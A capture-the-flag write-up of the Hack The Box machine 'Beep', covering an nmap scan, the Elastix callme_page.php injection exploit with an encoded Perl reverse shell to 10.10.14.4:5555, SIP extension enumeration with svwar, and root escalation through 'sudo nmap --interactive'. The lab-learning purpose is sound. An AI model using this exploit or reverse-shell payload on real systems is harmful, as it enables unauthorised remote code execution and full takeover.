# Nmap 7.80 scan initiated Wed Sep 25 13:54:58 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 993,80,110,10000,143,3306,4190,4559,995,111,5038,443,22,4445,880,25,U:10000 10.10.10.7Nmap scan report for 10.10.10.7Host is up (0.23s latency).​PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)25/tcp open smtp Postfix smtpd|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,80/tcp open http Apache httpd 2.2.3|_http-server-header: Apache/2.2.3 (CentOS)|_http-title: Did not follow redirect to https://10.10.10.7/|_https-redirect: ERROR: Script execution failed (use -d to debug)110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) STLS AUTH-RESP-CODE TOP USER RESP-CODES UIDL APOP PIPELINING LOGIN-DELAY(0) EXPIRE(NEVER)111/tcp open rpcbind 2 (RPC #100000)143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4|_imap-capabilities: BINARY UNSELECT Completed ATOMIC LITERAL+ X-NETSCAPE LIST-SUBSCRIBED SORT=MODSEQ IDLE UIDPLUS ACL MULTIAPPEND IMAP4rev1 RIGHTS=kxte STARTTLS CATENATE THREAD=ORDEREDSUBJECT NAMESPACE NO ANNOTATEMORE THREAD=REFERENCES LISTEXT OK CHILDREN CONDSTORE QUOTA MAILBOX-REFERRALS IMAP4 URLAUTHA0001 SORT ID RENAME443/tcp open ssl/https?|_ssl-date: 2019-09-25T08:20:35+00:00; -7m55s from scanner time.880/tcp open status 1 (RPC #100024)993/tcp open ssl/imap Cyrus imapd|_imap-capabilities: CAPABILITY995/tcp open pop3 Cyrus pop3d3306/tcp open mysql MySQL (unauthorized)4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)4445/tcp open upnotifyp?4559/tcp open hylafax HylaFAX 4.3.105038/tcp open asterisk Asterisk Call Manager 1.110000/tcp open http MiniServ 1.570 (Webmin httpd)|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purpose|media device|PBX|WAP|printer|specializedRunning (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), HP embedded (94%), Enterasys embedded (94%), Netgear embedded (94%), Osmosys embedded (93%), Riverbed RiOS (93%)OS CPE: cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/h:enterasys:ap3620 cpe:/h:netgear:eva9100 cpe:/o:riverbed:riosAggressive OS guesses: Linux 2.6.27 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.18 (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.30 (95%), Linux 2.6.5 (Fedora Core 2) (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.5-7.283-smp (SuSE Enterprise Server 9, x86) (95%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix​Host script results:|_clock-skew: -7m55s​TRACEROUTE (using port 22/tcp)HOP RTT ADDRESS1 226.92 ms 10.10.14.12 227.25 ms 10.10.10.7​OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Wed Sep 25 14:01:06 2019 -- 1 IP address (1 host up) scanned in 368.60 seconds
Running all the services through the searchsploit
didn't get me anything worthwhile, either the exploits failed or were not at all working due to compatibility or version issues. The obvious attack vectors left were the web-servers on port 10000
and 80
. The one at 10000
didn't have anything interesting however the one at 80
, the elastix
server had some publicly available exploits, namely 18650
.
--- SNIP ---import urllibimport sslrhost="10.10.10.7"lhost="10.10.14.4"lport=5555extension="1000"​url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'urllib.urlopen(url)--- SNIP ---
Running the script as it is didn't get me the shell as expected however did get me SSL errors, which I tried resolving using the modified script below, and along side that I had to find a valid extension number which I did using the following snippet of svwar
tool.
svwar -m INVITE -e100-300 10.10.10.7
import urllibimport sslrhost="10.10.10.7"lhost="10.10.14.4"lport=5555extension="233"​# Reverse shell payloadctx = ssl.create_default_context()ctx.check_hostname = Falsectx.verify_mode = ssl.CERT_NONE​url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'urllib.urlopen(url, context=ctx)
However this didn't seem to work either, still got SSL errors, so as I knew this was just making a request to a the web-server with some parameters, so I pasted the request in the browser and kept listening for the reverse shell and to my surprise I got the reverse shell.
$ nc -lvnp 5555listening on [any] 5555 ...connect to [10.10.14.4] from (UNKNOWN) [10.10.10.7] 58227iduid=100(asterisk) gid=101(asterisk)
Beneath the exploit script itself there was a way mentioned for privilege escalation, to which I gave a shot and to my astonishment that worked out just fine and got me root shell.
sudo nmap --interactiveStarting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )Welcome to Interactive Mode -- press h <enter> for helpnmap> !shbashiduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)cat /root/root.txtd88e0***cat /home/fanis/user.txtaeff3***
I learnt about SIP extensions and how to find a valid one for the machine and target, and how reading the exploit scripts in details can actually help in owning the complete machine.